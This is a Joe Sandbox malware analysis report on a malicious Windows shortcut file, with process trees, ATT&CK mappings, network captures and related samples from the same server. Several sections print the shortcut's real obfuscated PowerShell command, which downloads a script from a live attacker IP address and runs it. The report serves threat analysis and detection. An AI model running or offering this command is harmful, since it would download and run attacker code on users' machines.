Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252	Thread sleep count: 3598 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252	Thread sleep count: 6219 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 368	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 PowerShell	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	11 Process Discovery	Remote Services	Data from Local System	11 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	11 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
EzE0GqgjU0.lnk	24%	ReversingLabs	Win32.Trojan.Boxter
EzE0GqgjU0.lnk	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://95.169.201.100:18960/uploads/team-1/readme.txt)	0%	Avira URL Cloud	safe
http://95.169.201.100:18960/uploads/team-1/readme.txt	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://95.169.201.100:18960/uploads/team-1/readme.txt	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://95.169.201.100:18960/uploads/team-1/readme.txt)	EzE0GqgjU0.lnk	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.169.201.100	unknown	Bulgaria		41017	GOBULNETBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568476
Start date and time:	2024-12-04 16:49:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EzE0GqgjU0.lnk renamed because original name is a hash value
Original Sample Name:	9c7e3396ea85258017f63420a73ff3bf8be2c108b09dbbeb26237bfa3c3f549e.lnk
Detection:	MAL
Classification:	mal100.troj.winLNK@4/4@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: EzE0GqgjU0.lnk

Simulations

Behavior and APIs

Time	Type	Description
10:50:03	API Interceptor	582x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
95.169.201.100	rim2HzF9qx.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100:18956/api/secure/98d578acc14ad4fa74fea36dedb81fa4
	dlAJGVJAQ3.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100:18956/api/secure/724c9e6bee4672b1d09c7e48c0bda44a
	FzJh43Lpcs.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100:18956/api/secure/6064b1695dc125e6fe96e1c31d0fb5d7
	Lfk3xTOHyh.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100:18956/api/secure/6e830590925e041c63e0b3005bdcdf12
	1fZQojwhtS.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100:18956/api/secure/0778f73cfc70bd6ecf1d098fa7504a53
	sF5nNt8usL.bat	Get hash	malicious	Unknown	Browse	95.169.201.100:18960/uploads/team-5/readme.exe
	oLY6JbNl9i.bat	Get hash	malicious	Unknown	Browse	95.169.201.100:18960/uploads/test-1/readme.exe
	9aTcxCmLgM.bat	Get hash	malicious	Unknown	Browse	95.169.201.100:18960/uploads/team-4/readme.exe
	4l5IFxl9t3.bat	Get hash	malicious	Unknown	Browse	95.169.201.100:18960/uploads/team-3/readme.exe
	B3N4x4meoJ.bat	Get hash	malicious	Unknown	Browse	95.169.201.100:18960/uploads/test-2/readme.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GOBULNETBG	rim2HzF9qx.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100
	dlAJGVJAQ3.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100
	FzJh43Lpcs.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100
	Lfk3xTOHyh.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100
	1fZQojwhtS.lnk	Get hash	malicious	Unknown	Browse	95.169.201.100
	sF5nNt8usL.bat	Get hash	malicious	Unknown	Browse	95.169.201.100
	oLY6JbNl9i.bat	Get hash	malicious	Unknown	Browse	95.169.201.100
	9aTcxCmLgM.bat	Get hash	malicious	Unknown	Browse	95.169.201.100
	4l5IFxl9t3.bat	Get hash	malicious	Unknown	Browse	95.169.201.100
	B3N4x4meoJ.bat	Get hash	malicious	Unknown	Browse	95.169.201.100

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:Nlllul5mxllp:NllU4x/
MD5:	3A925CB766CE4286E251C26E90B55CE8
SHA1:	3FA8EE6E901101A4661723B94D6C9309E281BD28
SHA-256:	4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
SHA-512:	F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrrfhykx.5ya.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvqaqjlb.fri.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
Entropy (8bit):	4.572419998703764
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	EzE0GqgjU0.lnk
File size:	1'596 bytes
MD5:	162434f6a1f739dc14ac5c644019b34f
SHA1:	0bd42f8aab9653eba62d40a5229f079f2fdbd741
SHA256:	9c7e3396ea85258017f63420a73ff3bf8be2c108b09dbbeb26237bfa3c3f549e
SHA512:	3f73352af12ce67a9841a1456f3c2014a02c2ea0262f12f2e3fc1076a50445c5195d1623160d1d7171aaee68022e95aeed1ee64c8c6f897faa602afb38e66a69
SSDEEP:	48:8GIWax4PsU/mImzjp7DRIRMXv3SsgoQYk:8fWaxEs2mIOlDR2qvZg5Y
TLSH:	F831C1252DD86734C2734E3B89BAF2418F26B915AD338FAE4150518D0C60604EC35F3F
File Content Preview:	L..................F.... ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......

File Icon


Icon Hash:	74f4d4dcdcc9e1ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\Windows\System32\cmd.exe
Command Line Argument:	/c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Icon location:	%SystemRoot%\System32\SHELL32.dll

Network Behavior

Download Network PCAP: filtered – full

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 16:50:04.843372107 CET	49709	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:04.965405941 CET	18960	49709	95.169.201.100	192.168.2.6
Dec 4, 2024 16:50:04.965595007 CET	49709	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:04.969410896 CET	49709	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:05.089248896 CET	18960	49709	95.169.201.100	192.168.2.6
Dec 4, 2024 16:50:26.857391119 CET	18960	49709	95.169.201.100	192.168.2.6
Dec 4, 2024 16:50:26.857517958 CET	49709	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:26.867866039 CET	49709	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:26.870892048 CET	49752	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:26.987740040 CET	18960	49709	95.169.201.100	192.168.2.6
Dec 4, 2024 16:50:26.990714073 CET	18960	49752	95.169.201.100	192.168.2.6
Dec 4, 2024 16:50:26.990866899 CET	49752	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:26.991156101 CET	49752	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:27.110908031 CET	18960	49752	95.169.201.100	192.168.2.6
Dec 4, 2024 16:50:48.904175043 CET	18960	49752	95.169.201.100	192.168.2.6
Dec 4, 2024 16:50:48.904405117 CET	49752	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:48.904813051 CET	49752	18960	192.168.2.6	95.169.201.100
Dec 4, 2024 16:50:49.024718046 CET	18960	49752	95.169.201.100	192.168.2.6

HTTP Request Dependency Graph

95.169.201.100:18960

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	95.169.201.100	18960	2548	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 16:50:04.969410896 CET	190	OUT	GET /uploads/team-1/readme.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 95.169.201.100:18960 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49752	95.169.201.100	18960	2548	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 16:50:26.991156101 CET	190	OUT	GET /uploads/team-1/readme.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 95.169.201.100:18960 Connection: Keep-Alive

Statistics

CPU Usage

• cmd.exe
• conhost.exe
• powershell.exe

Click to jump to process

Memory Usage

• cmd.exe
• conhost.exe
• powershell.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Click to jump to process

Target ID:	1
Start time:	10:50:01
Start date:	04/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Imagebase:	0x7ff793370000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:50:01
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:50:01
Start date:	04/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EzE0GqgjU0.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrrfhykx.5ya.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvqaqjlb.fri.psm1

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: cmd.exePID: 5576, Parent PID: 4004

General

File Activities

Windows Analysis Report
EzE0GqgjU0.lnk